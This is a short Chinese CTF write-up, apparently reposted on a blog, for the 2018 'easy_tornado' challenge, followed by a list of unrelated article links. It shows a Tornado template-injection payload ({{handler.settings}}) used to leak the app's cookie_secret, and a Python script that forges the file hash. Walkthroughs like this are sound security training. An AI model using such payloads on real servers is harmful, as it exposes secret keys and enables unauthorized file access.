当前位置: 首页 > news >正文

[护网杯 2018]easy_tornado

news 2025/8/3 8:39:47

这里有一个hint点进去看看,他说md5(cookie_secret+md5(filename)),所以我们需要获得cookie_secret的value

根据题目tornado,它可能是tornado的SSTI

这里吧filehash改为NULL.

是tornado的SSTI   

输入{{handler.settings}}  (settings 属性是一个字典,它包含了Tornado应用的全局配置信息)

查看全局配置

拿到cookie_secret

开始构造exp

import hashlib
filename='/fllllllllllllag'
cookie_secret = '76fc62a3-fea5-46ab-8f95-4b7262246f8c'
filename=hashlib.md5(filename.encode()).hexdigest()
a=cookie_secret+filename
result=hashlib.md5(a.encode()).hexdigest()
print(result)

http://www.lryc.cn/news/492744.html

相关文章:

  • 基于STM32的智能风扇控制系统
  • 决策树——基于乳腺癌数据集与cpu数据集实现
  • 探索空间自相关:揭示地理数据中的隐藏模式
  • echarts使用示例
  • Flink高可用配置(HA)
  • 如何编写出色的技术文档
  • 学习日记_20241126_聚类方法(谱聚类Spectral Clustering)
  • 图书系统小案例
  • 目标检测之学习路线(本科版)
  • C#调用C++ DLL方法之C++/CLI(托管C++)
  • 免费搭建一个属于自己的个性化博客(Hexo+Fluid+Github)
  • vue3 开发利器——unplugin-auto-import
  • 开发需求总结19-vue 根据后端返回一年的数据,过滤出符合条件数据
  • 人工智能如何改变创新和创造力?
  • Github 基本使用学习笔记
  • 群论入门笔记
  • 2024最新python使用yt-dlp
  • Python + 深度学习从 0 到 1(00 / 99)
  • 单点登录深入详解之设计方案总结
  • Loadsh源码分析-forEach,eachRight,map,flatMap,flatMapDeep,flatMapDepth
  • 检测到“runtimelibrary”的不匹配项: 值“mtd_staticdebug”不匹配值“mdd_dynamic”
  • go clean -modcache命令清理缓存
  • C#结构体排序(数组)
  • 基于边缘智能网关的机房安全监测应用
  • 【Jenkins】自动化部署 maven 项目笔记
  • LeetCode 3243. Shortest Distance After Road Addition Queries I
  • ML 系列:第 31 节— 机器学习中的协方差和相关性
  • 【鸿蒙】鸿蒙开发过程中this指向问题
  • d3-contour 生成等高线图
  • Ubuntu20.04离线安装全教程(包括DellR940重置Raid 5、安装Ubuntu、设置root、安装nvidia英伟达显卡驱动及设置防火墙白名单)